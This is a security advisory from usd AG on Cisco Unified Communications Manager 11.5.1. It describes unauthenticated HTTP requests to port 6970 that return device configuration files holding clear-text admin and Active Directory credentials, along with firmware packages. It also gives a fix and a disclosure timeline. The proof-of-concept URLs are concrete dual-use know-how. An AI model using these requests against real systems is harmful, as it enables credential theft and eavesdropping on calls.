usd-2018-0036 | Cisco Unified Communications Manager (CallManager)/11.5.1.15900-18 (likely in all versions)

Advisory ID: usd-2018-0036
CVE Number: N/A
Affected Product: Unified Communications Manager
Affected Version: 11.5.1.15900-18 (likely in all versions)
Vulnerability Type: Exposure of Sensitive Configuration Data
Security Risk: Critical
Vendor URL: https://www.cisco.com
Vendor Status: Unknown

Description

Cisco Unified Communications Manager (CallManager) is a server component for video conferencing and video telephony infrastructures. A typical setup of Cisco Unified Communications infrastructures includes one or multiple CallManagers connected to a number of video conferencing devices, such as Cisco TelePresence SX20. The TelePresence devices, which can e.g. be located in conference rooms, connect to the CallManagers to retrieve configuration files and when a video call takes place. usd discovered multiple vulnerabilities in the way these devices interact and within the CallManager itself.

First Proof of Concept

A request to the following URL will retrieve the configuration file of a specific device, containing clear-text credentials. Replace SEPXXXXXXXXX with the device name:
http://10.10.10.10:6970/SEPXXXXXXXXX.cnf.xml

The resulting XML file contains clear-text credentials within the following tags:

adminpassw0rd!

Using these credentials the attacker can now authenticate to the target device via SSH or HTTPS. This allows the attacker to manipulate its configuration or create and download captures of network traffic. These captures can be used to eavesdrop on video and audio calls.

Second Proof of Concept

A request to the following URL will retrieve a configuration file, containing AD user credentials:
http://10.10.10.10:6970/SPDefault.cnf.xml

The resulting XML file contains clear-text credentials within the following tags:

AD-Domain\ucm_userucm_passw0rd!

This data may provide attackers with access to a valid domain user.

Third Proof of Concept

A request to the following URL served up a firmware package:
http://10.10.10.10:6970/s52010ce9_4_1-6ae80e1f2ee.pkg

Note: This file name may be different on other CallManagers.
The XML files mentioned above include references to these files names, such as:s52020ce9_4_1-6ae80e1f2ee.pkg
Knowledge of the firmware allows attackers to search for additional vulnerabilities within the software.

Fix

To prevent unauthorized access to this data the CallManager needs to properly authenticate client devices. Additionally, the CallManager should utilize HTTPS for transport encryption.

Timeline

  • 2018-10-31 Advisory has been sent to psirt@cisco.com
  • 2018-11-09 extended public disclosure deadline to 2019-01-23
  • 2019-01-23 Security advisory released

Credits

This security vulnerabilities were discovered by Marcus Gruber and Maximilian Boehner of usd AG.

ABOUT usd SECURITY ADVISORIES

In order to protect businesses against hackers and criminals, we always have to keep our skills and knowledge up to date. Thus, security research is just as important for our work as is building up a security community to promote the exchange of knowledge. After all, more security can only be achieved if many individuals take on the task.

Our CST Academy and our usd HeroLab are essential parts of our security mission. We share the knowledge we gain in our practical work and our research through training courses and publications. In this context, the usd HeroLab publishes a series of papers on new vulnerabilities and current security issues.

Always for the sake of our mission: „more security.“

to usd AG


In accordance with usd AG’s Responsible Disclosure Policy, all vendors have been notified of the existence of these vulnerabilities.

Disclaimer

The information provided in this security advisory is provided „as is“ and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.